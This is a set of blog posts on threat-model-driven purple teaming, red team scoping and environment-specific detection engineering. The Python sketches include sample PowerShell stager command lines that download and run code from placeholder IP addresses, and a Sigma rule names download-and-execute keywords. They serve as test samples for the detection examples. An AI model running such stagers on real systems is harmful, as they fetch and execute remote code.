Purple Teaming Threat Modelling

Your Purple Team Test Failed Because Your Threat Model Is Wrong

Hugh McGauran March 20, 2026 6 min read

You ran a purple team exercise last week. Your red team executed a flawless attack chain: initial access via phishing, lateral movement via Kerberos relay, privilege escalation, and data exfiltration. Picture perfect.

Then you got the debrief: your EDR caught nothing. Your SIEM was silent. Your firewalls didn't alert. Your detection engineers looked at you and said, "Our tools are misconfigured."

They're wrong. And you probably are too.

The problem isn't your tools. It's that your red team tested an adversary that doesn't exist in your environment.

The Fundamental Mismatch

Here's what I see happen in most purple team programmes:

Red team is given a playbook. Usually MITRE ATT&CK or some vendor-blessed "attack pattern." Test everything: initial access, lateral movement, persistence, exfil. Be creative.
Blue team sits and watches. They monitor alerts. When nothing fires, they assume detection is broken. They tune. They add rules. They adjust thresholds.
Repeat. Next quarter, red team runs the same tests. Still nothing fires (or things fire randomly, drowning in false positives). Conclusion: "We need better tooling."

Here's what's actually happening: You're testing threat capabilities your environment doesn't support.

An Example

Let's say you're a mid-sized financial services firm. Your threat model is: targeted APTs (FIN7, Lazarus), occasional script kiddies, insider threats.

Your environment: Windows 10/11 workstations, hardened build. Modern domain controllers with Kerberos hardening. Network segmentation: finance backend on isolated VLAN. EDR deployed globally. No plaintext credentials stored on endpoints. Conditional Access enforces MFA.

Your red team shows up and runs Mimikatz, tries Kerberos relay attacks, attempts lateral movement across network segments, and exfiltrates via unencrypted channels.

Result: EDR blocks the binaries. Lateral movement fails (segmentation). Nothing detectable because nothing succeeds.

Your blue team concludes: "EDR is misconfigured. We need better visibility into Kerberos traffic."

Wrong. Those attacks don't fit your threat model. An actual FIN7 intrusion into your environment would:

Use living-off-the-land techniques (no Mimikatz)
Move laterally via legitimate admin tools (RDP, WinRM) already allowed in your firewall rules
Harvest credentials gradually over time, not via flashy one-shot dumping tools
Exfil via HTTP/HTTPS, not SMB or DNS tunneling

So it's fine that your tools stayed quiet on the red team's techniques: those attacks are not your risk. Your tools are configured for your actual adversary, not the MITRE ATT&CK checklist.

The Real Cost of Environment-Agnostic Testing

When you run tests that don't align with your threat model:

You get false confidence. Red team "successfully" executes techniques. You feel like you're being tested thoroughly. You're not.
You waste blue team time. Detection engineers spend weeks building rules for attacks that will never happen to you.
You create alert fatigue. All those rules for non-existent threats? They generate false positives. Your SOC tunes them down or disables them. Then an actual threat uses a legitimate technique you didn't monitor.
You fund vendor marketing. Tool vendors love environment-agnostic testing. It justifies upgrading to the newest EDR feature, which you wouldn't need if your testing were threat-model-driven.

What Actually Works

Stop testing "everything." Start testing what you're actually at risk from.

Step 1: Define your threat model. Ask yourself: Who targets companies like mine? What are they after? What access do they typically start with? What's their environment awareness? Write this down. Three paragraphs, maximum.

Step 2: Map your environment against that threat. What attack paths does your threat model realistically have access to? What techniques are actually possible? What detection gaps exist on those paths?

Step 3: Test only the relevant paths. Your red team doesn't run the MITRE ATT&CK playbook. They run your threat playbook.

If FIN7 uses spear-phishing and living-off-the-land lateral movement, test that. If they exfil via HTTPS, test that — and tune your detection to spot anomalous HTTPS traffic from workstations. If they're blocked by your segmentation, celebrate the segmentation and move to the next gap.
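Step 2 can be sketched as a simple filter. This is a minimal illustration, not a tool: the technique list, the precondition labels, and the environment facts below are all hypothetical placeholders that you would replace with your own threat model and asset data.

```python
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Technique:
    name: str
    used_by_adversary: bool   # does our threat model say they use it?
    requires: frozenset = field(default_factory=frozenset)  # conditions the environment must offer


# Hypothetical facts about the environment (assumptions, not measured data).
ENVIRONMENT = frozenset({
    "email_reaches_users",
    "rdp_allowed_between_workstations_and_servers",
    "https_egress_from_workstations",
})

# Hypothetical candidate techniques and what each one needs in order to work.
CANDIDATES = [
    Technique("Spear-phishing", True, frozenset({"email_reaches_users"})),
    Technique("Lateral movement over RDP", True,
              frozenset({"rdp_allowed_between_workstations_and_servers"})),
    Technique("HTTPS exfiltration", True, frozenset({"https_egress_from_workstations"})),
    Technique("Mimikatz credential dump", False, frozenset({"edr_absent"})),
    Technique("Kerberos relay", False, frozenset({"unhardened_kerberos"})),
]


def in_scope(candidates, environment):
    """Keep techniques the adversary uses AND the environment makes possible."""
    return [t for t in candidates
            if t.used_by_adversary and t.requires <= environment]


for technique in in_scope(CANDIDATES, ENVIRONMENT):
    print(technique.name)
```

Whatever survives the filter is the red team's playbook for the exercise. Everything else is a control to celebrate, not a detection to build.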

The Honest Conversation

"Your tools are configured correctly for the threats you actually face. When red team tests succeed using techniques that wouldn't work in a real intrusion, that's not a detection failure — that's a sign your test wasn't threat-driven. Let's refocus on the adversaries who can actually hurt us."

This conversation is uncomfortable because it implies your purple team programme might be theatre. But it's the one that matters.

What's Next

For your next purple team exercise:

Spend time defining your threat model, not selecting techniques
Have blue team validate which attack paths are realistic in your environment
Red team tests those paths, trying to evade detection on actual adversary techniques
Blue team tunes for those specific gaps

The tests will be less flashy. You won't check every MITRE ATT&CK technique. But when red team succeeds, it means something: you've found a real gap against a real threat. That's worth a lot more than catching Mimikatz on a hardened system that would never run it in the first place.

Next: How to actually scope a red team exercise to your threat model. Plus: Real detection gaps found in a financial services engagement.


Detection Engineering Blue Team

Detection Engineering in a Real Environment: Why Generic Rules Fail

Hugh McGauran March 27, 2026 7 min read

I walked into a SOC last month where they'd deployed 847 Sigma rules.

Eight hundred and forty-seven.

The detection engineers were proud. They'd built a comprehensive ruleset covering the entire MITRE ATT&CK framework. Every technique had detection logic. Nothing would slip through, they said.

The SOC was drowning. Sixty percent of alerts were false positives. They'd stopped tuning months ago and just turned off entire rule categories. The analysts were burnt out, clicking "snooze" on everything.

Here's what nobody told them: Generic detection rules fail in real environments because real environments aren't generic.

The Rule That Doesn't Work

Let's look at a real example. This is a common Sigma rule (simplified):

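title: Suspicious PowerShell Execution
logsource:
  product: windows
  service: security    # Event 4688 needs process-creation and command-line auditing enabled
detection:
  selection:
    EventID: 4688      # "A new process has been created"
    NewProcessName|endswith: '\powershell.exe'
    CommandLine|contains:    # matches if any one of the listed strings appears
      - 'IEX'
      - 'Invoke-Expression'
      - 'DownloadString'
  condition: selection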

This rule fires when PowerShell runs with suspicious keywords. Seems solid. Catches code injection, right?

Now let's deploy it in a real environment:

Your software deployment tool (SCCM, Ansible) runs PowerShell scripts with DownloadString. Alert every 30 seconds. Disable the rule.
Your backup vendor runs scheduled PowerShell jobs that invoke expressions. Thousands of alerts per day. Tune it out.
Your developers run inline commands with "IEX" in comments or string literals. The substring match fires anyway. Noise.
Your EDR has whitelisting for Microsoft-signed PowerShell; your SIEM doesn't. It alerts on things EDR already allowed.

By week two, detection engineers have excluded half of what the rule was meant to match. By the end of month one, it's gone. And when an attacker actually uses PowerShell injection, it's not being monitored because the rule was too noisy to keep.

The rule didn't fail because it was poorly written. It failed because it was environment-agnostic.
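To see why the keywords alone cannot separate benign from malicious use, here is a small Python sketch of the same substring logic. The command lines are invented for illustration, and the matcher is only a stand-in for a SIEM backend (Sigma string matches are case-insensitive by default, which is what the function imitates).

```python
KEYWORDS = ("IEX", "Invoke-Expression", "DownloadString")


def rule_matches(command_line: str) -> bool:
    """Mimic a case-insensitive `CommandLine|contains` match on any keyword."""
    lowered = command_line.lower()
    return any(keyword.lower() in lowered for keyword in KEYWORDS)


# Hypothetical samples: (description, command line, is it actually malicious?)
SAMPLES = [
    ("deployment tool",
     "powershell.exe -Command \"(New-Object Net.WebClient).DownloadString('https://deploy.example.internal/agent.ps1')\"",
     False),
    ("backup job",
     "powershell.exe -Command \"Invoke-Expression (Get-Content C:\\Backup\\job.ps1 -Raw)\"",
     False),
    ("attacker stager",
     "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')\"",
     True),
    ("routine admin query",
     "powershell.exe -Command \"Get-Service | Where-Object Status -eq Running\"",
     False),
]

alerts = [(desc, malicious) for desc, cmd, malicious in SAMPLES if rule_matches(cmd)]
false_positives = [desc for desc, malicious in alerts if not malicious]

print(f"{len(alerts)} alerts, {len(false_positives)} of them benign: {false_positives}")
```

In this toy set the rule fires on the deployment tool and the backup job just as readily as on the stager. The keywords describe a technique, not an intent, so the context has to come from your environment.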

Why Generic Rules Don't Survive Contact with Reality

Detection rules written in a vacuum assume: no legitimate tools use the same technique; all environments have the same baseline behaviour; detection can be tuned to pure signal; attackers use the same techniques in every environment. All false.

In a real environment:

1. Legitimate tooling is weird. Your backup software might use SMB in ways that look like lateral movement. Your monitoring agent might inject DLLs that look like persistence. Your deployment pipeline might run binaries with command-line obfuscation that looks like evasion.

2. Baselines vary wildly. A developer workstation runs PowerShell constantly. A kiosk never does. A bank branch server runs different software than your headquarters. A rule tuned for one environment is useless or too noisy in another.

3. Tuning for signal means losing sensitivity. You can build a rule that catches 100% of attacks — but it'll also alert on 10,000 false positives. There's no free lunch.

4. Attackers adapt to your environment. An attacker who knows you monitor PowerShell won't use PowerShell. They'll use legitimate admin tools, scheduled tasks, or techniques that blend into your baseline.
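The trade-off in point 3 is easy to put numbers on. The sketch below assumes, purely for illustration, that the noisy rule catches 5 real attacks among its 10,000 false positives, and that a tuned version catches 4 of those 5 with 6 false positives. Neither set of figures comes from a real deployment.

```python
def precision(true_positives: int, false_positives: int) -> float:
    """Share of alerts that are real attacks."""
    return true_positives / (true_positives + false_positives)


def recall(true_positives: int, false_negatives: int) -> float:
    """Share of real attacks that produced an alert."""
    return true_positives / (true_positives + false_negatives)


# Hypothetical figures for the same rule before and after tuning.
noisy = {"tp": 5, "fp": 10_000, "fn": 0}
tuned = {"tp": 4, "fp": 6, "fn": 1}

for label, r in (("noisy", noisy), ("tuned", tuned)):
    print(f"{label}: precision={precision(r['tp'], r['fp']):.4f} "
          f"recall={recall(r['tp'], r['fn']):.2f}")
```

Under these assumptions the noisy rule has perfect recall, but only about one alert in 2,000 is real, which is the rule analysts learn to snooze. The tuned rule gives up one attack in five and in exchange produces alerts that get read.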

The Real Problem With Sigma

Sigma is excellent. Open-source, community-driven, better than nothing. But Sigma is a language, not a solution. It's like saying "I have a hammer" and expecting to build a house. You need a builder.

When people drop Sigma rules from the internet into their SIEM without context, they get either blindly tuned rules (so permissive they're useless), overly aggressive rules (so noisy they're turned off within a week), or rules that don't apply — designed for environments completely different from yours.

I've seen security teams import 1000 Sigma rules and then abandon 900 of them. That's not a detection programme; that's security theatre.

What Actually Works

Effective detection is built bottom-up, not top-down.

Start with your environment baseline. Run your legitimate tools and systems for a week. Capture: normal PowerShell execution patterns, normal network connections, normal process relationships, normal file writes. Write this down. This is your noise floor. Anything within it is expected; anything outside it is worth a look.
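As a rough sketch of what capturing "normal process relationships" can look like, the Python below records which parent and child process pairs were seen on each host role during the observation week, then flags pairs that were never seen. The host roles, process names, and the record format are hypothetical; real input would come from your own process-creation logs.

```python
from collections import Counter

# Hypothetical process-creation records from the observation week:
# (host role, parent process, child process)
BASELINE_EVENTS = [
    ("dev-workstation", "explorer.exe", "powershell.exe"),
    ("dev-workstation", "code.exe", "powershell.exe"),
    ("dev-workstation", "explorer.exe", "powershell.exe"),
    ("finance-server", "services.exe", "backupagent.exe"),
    ("finance-server", "backupagent.exe", "powershell.exe"),
]


def build_baseline(events, min_count=1):
    """Return the set of (role, parent, child) tuples seen at least min_count times."""
    counts = Counter(events)
    return {key for key, seen in counts.items() if seen >= min_count}


def outside_baseline(event, baseline):
    """True when this exact relationship was never observed during baselining."""
    return event not in baseline


baseline = build_baseline(BASELINE_EVENTS)

new_events = [
    ("dev-workstation", "explorer.exe", "powershell.exe"),   # routine
    ("finance-server", "winword.exe", "powershell.exe"),     # never seen on this role
]
for event in new_events:
    print(event, "REVIEW" if outside_baseline(event, baseline) else "expected")
```

Keying the baseline on host role is the design choice that matters here: PowerShell launched from an editor is routine on a developer workstation and worth a look on a finance server.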

Then build detection for your actual threats. Not MITRE ATT&CK. Not Sigma. Your threats. FIN7 would use living-off-the-land techniques in your environment. Ransomware would move laterally using your admin tools.

Example: You know that administrative access to your financial database should only come from 3 specific systems, at 2 PM on Mondays (batch job), from 2 specific service accounts. Anything else? Alert immediately. False positives stay rare because the rule encodes your own baseline.
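The database example translates almost directly into code. In this sketch the host names and service account names are invented placeholders, and the batch window is assumed to be the whole 2 PM hour.

```python
from datetime import datetime

# Hypothetical values standing in for the real baseline.
ALLOWED_SOURCES = {"batch-01", "batch-02", "dba-jump-01"}
ALLOWED_ACCOUNTS = {"svc_batch_load", "svc_batch_report"}
ALLOWED_WEEKDAY = 0   # Monday (datetime.weekday() counts Monday as 0)
ALLOWED_HOUR = 14     # assumed batch window: 14:00 to 14:59


def should_alert(source_host: str, account: str, when: datetime) -> bool:
    """Alert on any admin login that falls outside the documented baseline."""
    expected = (
        source_host in ALLOWED_SOURCES
        and account in ALLOWED_ACCOUNTS
        and when.weekday() == ALLOWED_WEEKDAY
        and when.hour == ALLOWED_HOUR
    )
    return not expected


# Monday batch run from a known system: expected, no alert.
print(should_alert("batch-01", "svc_batch_load", datetime(2026, 3, 23, 14, 5)))
# Same system and account, but early on a Wednesday morning: alert.
print(should_alert("batch-01", "svc_batch_load", datetime(2026, 3, 25, 3, 12)))
# Right account and time, unknown source host: alert.
print(should_alert("hr-laptop-17", "svc_batch_load", datetime(2026, 3, 23, 14, 5)))
```

The rule is short because the knowledge lives in the three constants. Keeping those current when the batch schedule or the service accounts change is the real maintenance cost.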

Tune for precision, not coverage. Don't try to detect every possible attack technique. Detect the ones that matter to you. Ten precise, high-fidelity rules that catch real attacks beat 1000 rules that trigger on everything.

The Role of Generic Rules

Sigma and community rules aren't useless. They're a starting point — a hypothesis library. Use them like this:

Review — Which techniques are relevant to my threat model?
Understand — What is this rule trying to catch? How does it work?
Evaluate — Would this detect an attack in my environment, or would it be lost in noise?
Adapt — Rewrite it for my baseline. Add context (system type, user, time of day). Whitelist known legitimate use cases.
Test — Run it against historical data. Does it catch what you expect? How many false positives?
Deploy — Only if it's precise enough to keep tuned for more than a month.
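The Test step can be as simple as replaying labelled history through the adapted rule and counting outcomes. The sketch below is an assumption-heavy toy: the rule, the account names, and the four historical events are invented, and a real backtest would read from your SIEM rather than a list.

```python
def adapted_rule(event: dict) -> bool:
    """Hypothetical adapted rule: download cradle, except from the deployment service account."""
    cmd = event["command_line"].lower()
    return "downloadstring" in cmd and event["user"] != "svc_deploy"


# Hypothetical historical events; `malicious` is the analyst's label after triage.
HISTORY = [
    {"user": "svc_deploy", "malicious": False,
     "command_line": "powershell DownloadString('https://deploy.example.internal/a.ps1')"},
    {"user": "jsmith", "malicious": False,
     "command_line": "powershell Get-ChildItem C:\\Temp"},
    {"user": "jsmith", "malicious": True,
     "command_line": "powershell IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/x')"},
    {"user": "akhan", "malicious": False,
     "command_line": "powershell DownloadString('https://intranet.example.internal/setup.ps1')"},
]


def backtest(rule, events):
    """Count hits, false alarms, and misses for a rule over labelled history."""
    result = {"true_positive": 0, "false_positive": 0, "false_negative": 0}
    for event in events:
        fired = rule(event)
        if fired and event["malicious"]:
            result["true_positive"] += 1
        elif fired:
            result["false_positive"] += 1
        elif event["malicious"]:
            result["false_negative"] += 1
    return result


print(backtest(adapted_rule, HISTORY))
```

In this toy history the exclusion removes the deployment noise, but one benign intranet download still fires. That is the kind of result that sends you back to Adapt before you reach Deploy.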

The Uncomfortable Truth

If your detection programme consists of rules from the internet, Sigma rules you didn't adapt, detection thresholds you didn't tune, and coverage of every MITRE ATT&CK technique — then you have a detection programme in name only.

Detection engineering is environment-specific work. It can't be outsourced to community rules or vendor defaults. It requires someone who understands your systems, your threats, and your tools. That person is on your team. Or you don't have effective detection.

What's Next

Audit your rules. How many do you actually tune and maintain? Delete the rest.
Establish your baseline. Document normal behaviour for critical systems.
Build environment-specific rules for your threat model. Don't import; adapt.
Focus on precision. Ten good rules beat 1000 mediocre rules.
Invest in the people who know your environment. That's where effective detection lives.

Next: Building a detection baseline for your critical systems. Plus: A real case where generic rules missed an entire attack.


Red Team Purple Teaming

Why Your Red Team Tests Are Designed to Fail (And You Don't Know It)

Hugh McGauran April 3, 2026 6 min read

Red team comes in on Monday. They've got a scope, a timeline, and a list of techniques to test. By Friday, they've "successfully executed" initial access, lateral movement, persistence, and exfiltration.

Blue team reviews the engagement. They have a list of "findings." Detection missed everything. Security posture looks weak.

So you hire another consultant. You buy more tooling. You run the test again next quarter. Same results.

Here's what nobody tells you: Your red team isn't testing what you think they're testing.

The Scope Problem

Let me walk you through a real engagement. Client is a mid-market insurance company. They scope the red team exercise: "Test our security posture against advanced threats. Use realistic techniques. Show us what an attacker could do."

Red team scope: initial access (everything), lateral movement (everything on the network), persistence (any means necessary), exfiltration (any data, any method).

This sounds comprehensive. It's actually a fantasy. An attacker targeting this client doesn't have "any means necessary" access to "everything on the network." Hard segmentation blocks them. Certain accounts have additional logging. Egress is constrained.

But the red team scope doesn't acknowledge these constraints. So red team tests in a sandbox where every attack succeeds because they're not fighting the real environment — they're fighting an idealised version of it.

The Environment Problem

Red team asks: "What systems can we access?" Blue team (or the client) says: "Whatever an attacker could realistically access." This is ambiguous. So red team interprets it broadly: everything reachable on the network is fair game.

What they should have asked: "What systems can an attacker realistically access given our segmentation, credential controls, and monitoring?"

A real attacker targeting insurance data doesn't have access to the file servers in marketing, the development lab, or the HVAC management system. But if nobody explicitly excludes those from scope, red team tests them anyway. Then when red team successfully gets to the marketing server (which has no monitoring), blue team documents it as a detection failure. Really, it's a scope definition failure.
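One way to make the better question concrete is to treat segmentation as a graph of allowed flows and ask what is reachable from the attacker's realistic foothold. The zone names and flows below are hypothetical, and the sketch models network reachability only; credential controls and monitoring would narrow the result further.

```python
from collections import deque

# Hypothetical allowed network flows after segmentation: source zone -> zones it may reach.
ALLOWED_FLOWS = {
    "user-workstations": {"claims-app", "file-share-general"},
    "claims-app": {"policy-db"},
    "marketing-servers": {"file-share-general"},
    "dev-lab": {"dev-lab-build"},
    "policy-db": set(),
    "file-share-general": set(),
    "dev-lab-build": set(),
}


def reachable_from(start: str, flows: dict) -> set:
    """Breadth-first search over allowed flows; returns every zone reachable from start."""
    seen = {start}
    queue = deque([start])
    while queue:
        zone = queue.popleft()
        for neighbour in flows.get(zone, ()):
            if neighbour not in seen:
                seen.add(neighbour)
                queue.append(neighbour)
    return seen


in_scope = reachable_from("user-workstations", ALLOWED_FLOWS)
out_of_scope = set(ALLOWED_FLOWS) - in_scope

print("in scope:", sorted(in_scope))
print("out of scope:", sorted(out_of_scope))
```

With a phished workstation as the starting point, the marketing servers and the development lab fall out of scope on their own. Nobody has to remember to exclude them, and nobody can later count them as detection failures.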

The Technique Problem

Red team gets creative. They use techniques that sound realistic but aren't actually part of any real attack chain for this environment:

Kerberos relay attacks (requires certain network conditions that don't exist here)
Memory-only persistence (requires no EDR; EDR is deployed)
Named pipe lateral movement (works in the test, but in production the pipes are monitored)
PowerShell obfuscation (the client's logging detects it; that logging just wasn't checked during the test)

Red team succeeds because they're testing in isolation. They're testing: "Is this technique possible?" not "Is this technique undetectable in your environment?"

The Time Problem

Red team has effectively unlimited time to find a path. A real attacker only has until they're detected.

Real attack: Attacker lands, spends 30 minutes poking around, tries three things, gets blocked on the third, leaves or adapts.

Red team test: Attacker lands, tries thirty things over a week, finds one that works, uses it, succeeds. The persistence and thoroughness of a week-long engagement are not representative of the speed and detection requirements of a real intrusion.

What This Means

Your red team engagement tells you: "Over an extended period, using known techniques, with no time pressure, against systems we can freely access, we were able to move laterally and exfiltrate data."

What it doesn't tell you: "Against your actual threat model, in real time, with your actual monitoring in place, this is what would happen." Those are very different questions.

The Better Approach

Real-world red team engagements should be scoped to match reality:

Threat-model driven scope. Don't test "everything." Test what your actual adversary would target and how they'd move.
Time-limited and detection-aware. Red team doesn't have unlimited time. They have 48 hours to land, move, and exfil before they assume they're burned. Blue team knows they're in the environment and is actively hunting.
Constrained to realistic access. Red team starts from the actual initial access vector, not "we've already compromised a workstation." They work with the access they actually get.
Detection evasion is the goal, not secondary. If it's immediately flagged, it fails — doesn't matter if the technique "works."
Realistic tool constraints. Red team uses tools an attacker would actually use. If a real attacker would avoid Mimikatz because EDR would catch it, so does red team.

A Simple Test

Ask yourself:

Did red team use techniques because they were realistic for your threat model, or because they worked in the test?
Would your actual threat actor have access to every system red team tested?
Did red team have to evade detection, or was it just running commands and seeing what worked?
Were there time or detection constraints that matched a real attack?

If the answer to any of these is "not really," your engagement was testing techniques, not threats.

Next: How to properly scope a red team exercise. Plus: A case study where realistic constraints changed the entire engagement outcome.


Purple Teaming Red Team Blue Team

Purple Teaming That Actually Works: A Framework for Real Collaboration

Hugh McGauran April 10, 2026 8 min read

You've got a red team and a blue team. They hate each other.

Red team thinks blue team is incompetent because they don't understand adversary tradecraft. Blue team thinks red team is reckless because they don't understand operational risk. They don't talk unless it's a quarterly "engagement."

Then someone tells you about "purple teaming" and you think: "Problem solved." It's not. Purple teaming is a methodology that requires real work. Most programmes fail because they're treated as a project (quarterly test) instead of a practice (continuous collaboration).

Here's how to actually do it.

The Failure Mode

Most purple team attempts follow this pattern:

Month 1: Announce purple team programme. Red and blue teams meet. There's optimism.

Month 2–3: Red team runs a "collaborative exercise." Blue team watches. Debrief is awkward.

Month 4: Nothing changes. Red team goes back to attacks. Blue team goes back to reactive defence.

Month 5: "Why aren't we purple teaming anymore?" Another meeting gets scheduled.

Month 6–12: Quarterly reports replace continuous collaboration. Programme becomes checkboxes.

Why does this happen? Because purple teaming requires fundamentally different thinking, and no one allocated time for that shift.

What Purple Teaming Actually Is

Purple teaming isn't red team + blue team in the same room. It's: continuous, aligned, threat-model-driven collaboration between attack and defence.

That's different from red teaming (I attack; you detect what I did), blue teaming (I defend; hope you don't break my things), penetration testing (contract engagement with findings), or security auditing (compliance check).

Purple teaming means: red team understands blue team's detection capabilities. Blue team understands attack sequences. Both teams align on what matters. Both teams iterate continuously to improve both attack and defence. Collaboration is built into operations, not scheduled quarterly.

The Framework

1. Establish Shared Threat Model (Week 1)

Red and blue teams sit together. No red team slides, no blue team slides. Just reality. Questions to answer together:

Who threatens us? (Be specific: APT groups, competitors, insiders, criminals)
What do they want? (Data, disruption, espionage, financial gain)
How do they typically access our environment?
What paths exist from initial access to objective?
How much time do they have?
What detection would burn them?

Document this. Write it down. "We believe APT28 targets financial services via spear-phishing for initial access. They move laterally within 2–4 hours. They exfil via HTTPS to infrastructure we can't block." This is not a consultant document. This is the shared foundation.
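If it helps to keep the written model consistent between teams, the same statement can live as a small structured record alongside the prose. This is only a sketch: the field names are my own invention, and the two TODO entries mark answers the example statement does not give.

```python
from dataclasses import dataclass, asdict
import json


@dataclass
class ThreatModel:
    adversary: str
    objective: str
    initial_access: str
    lateral_movement_window_hours: tuple   # (fastest, slowest) expected
    exfiltration_channel: str
    burning_detections: list               # detections that would end their operation


# Values come from the example statement; the TODO entries are placeholders
# for answers the teams still have to agree on together.
model = ThreatModel(
    adversary="APT28",
    objective="TODO: agree with leadership",
    initial_access="spear-phishing",
    lateral_movement_window_hours=(2, 4),
    exfiltration_channel="HTTPS to infrastructure we can't block",
    burning_detections=["TODO: agree between red and blue"],
)

print(json.dumps(asdict(model), indent=2))
```

A record like this is easy to diff at the monthly sync, which makes "did our threat model change?" a question with a visible answer.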

2. Map Realistic Attack Paths (Week 2–3)

Given that threat model, what are the actual attack paths? Not "everything MITRE ATT&CK says is possible." The paths your threat model actually uses.

Draw them, then blue team adds detection points at each stage. Now you have an attack sequence and a detection sequence. This is what you test. Not everything. This.
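The drawing can also be kept as data, so that gaps fall out mechanically. In the sketch below the stages and detection names are hypothetical examples, not a recommended path.

```python
# Hypothetical attack path: each stage lists the detections blue team has mapped to it.
ATTACK_PATH = [
    {"stage": "Initial access: spear-phishing",
     "detections": ["mail gateway attachment verdict"]},
    {"stage": "Execution: script launched from Office",
     "detections": ["Office spawning a script host"]},
    {"stage": "Lateral movement: RDP to server",
     "detections": []},
    {"stage": "Exfiltration: HTTPS upload",
     "detections": ["unusual outbound volume per workstation"]},
]


def undetected_stages(path):
    """Return the stages that have no detection point mapped to them."""
    return [step["stage"] for step in path if not step["detections"]]


def first_detection_index(path):
    """Index of the earliest stage with any detection, or None if the path is blind."""
    for index, step in enumerate(path):
        if step["detections"]:
            return index
    return None


print("Gaps to test first:", undetected_stages(ATTACK_PATH))
print("Earliest stage with coverage:", first_detection_index(ATTACK_PATH))
```

A stage with an empty detection list is where the next exercise should start. A mapped detection is still only a claim until red team has tried to slip past it.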

3. Red Team Operates Within Constraints (Ongoing)

Red team's job changes. They don't try to breach the environment. They try to follow the realistic threat path while evading detection.

Rules: start from your actual initial access vector; move only to systems your threat model would target; use tools and techniques your threat model would use; avoid detection — don't just run commands.

When red team succeeds: "We successfully executed the threat model while avoiding detection." When red team fails: "We were detected at the lateral movement phase." Both are valuable. Both tell blue team something real.

4. Blue Team Hunts Actively (Ongoing)

Blue team doesn't passively watch. They actively hunt for the attack. Weekly threat hunting sessions:

"Given our threat model, what would the initial access look like?"
"What can we detect in the first 30 minutes?"
"Can we spot lateral movement before they reach the objective?"

Use Atomic Red Team tests, but scoped to your paths. Update detection rules based on what red team teaches you about evasion.

5. Iterate (Monthly)

Once a month, red and blue teams sync: what did red team learn about evasion? What did blue team learn about detection? Did our threat model change? How did we do against a realistic attack?

Adjust next month's exercises based on findings.

The Governance

For this to work, you need time allocation: red team 20% of their week to collaborative exercises; blue team 5–10% of SOC time to active hunting; leadership time for monthly sync and iteration.

Metrics (not vanity metrics): mean time to detect for the threat model you care about; mean time to respond; techniques red team is using that blue team isn't catching; detection improvements month-over-month.
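These metrics are cheap to compute once each exercise action is logged with timestamps. The sketch below uses invented records, and it assumes "respond" means the time from detection to containment; definitions of mean time to respond vary, so pick one and keep it fixed.

```python
from datetime import datetime
from statistics import mean

# Hypothetical exercise records. `detected` is None when blue team never caught the action.
EXERCISES = [
    {"technique": "spear-phishing",
     "executed": datetime(2026, 4, 6, 9, 0),
     "detected": datetime(2026, 4, 6, 9, 20),
     "contained": datetime(2026, 4, 6, 10, 0)},
    {"technique": "RDP lateral movement",
     "executed": datetime(2026, 4, 6, 11, 0),
     "detected": None,
     "contained": None},
    {"technique": "HTTPS exfiltration",
     "executed": datetime(2026, 4, 7, 14, 0),
     "detected": datetime(2026, 4, 7, 14, 40),
     "contained": datetime(2026, 4, 7, 15, 40)},
]


def minutes_between(start, end):
    """Elapsed time between two timestamps, in minutes."""
    return (end - start).total_seconds() / 60


detected = [e for e in EXERCISES if e["detected"] is not None]
missed = [e["technique"] for e in EXERCISES if e["detected"] is None]

# Averages cover detected actions only; misses are reported separately below.
mttd = mean(minutes_between(e["executed"], e["detected"]) for e in detected)
mttr = mean(minutes_between(e["detected"], e["contained"]) for e in detected)

print(f"MTTD: {mttd:.0f} min, MTTR: {mttr:.0f} min, missed: {missed}")
```

Report the missed list next to the averages. A mean time to detect that silently leaves out everything you never detected is exactly the vanity metric to avoid.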

The Uncomfortable Part

This takes time. It's not shiny. It doesn't fit neatly on a security audit checklist. You can't outsource it to a quarterly consultant. You need your own people, aligned on threat model, collaborating continuously.

If you don't have budget for this, purple teaming won't work. You'll go through the motions and get the theatre. But if you do this right, you get: red team that understands why they're testing what they're testing; blue team that detects threats faster; security operations that improve month-over-month; collaborative culture instead of siloed teams.

Checklist: Do You Have a Real Purple Team Programme?

Shared, documented threat model (written, agreed by red + blue + leadership)
Realistic attack paths (not "test everything," but specific sequences)
Red team constrained to threat model (not unlimited scope)
Blue team actively hunting (not passively monitoring)
Monthly sync between teams (with iteration, not just reporting)
Detection improving month-over-month (measurable)
Budget allocated (not "squeeze in around other work")

If you don't check most of these, you have a red team and a blue team. You don't have purple teaming.

Next: Building a threat model with your team. Plus: How to measure purple team ROI without vanity metrics.
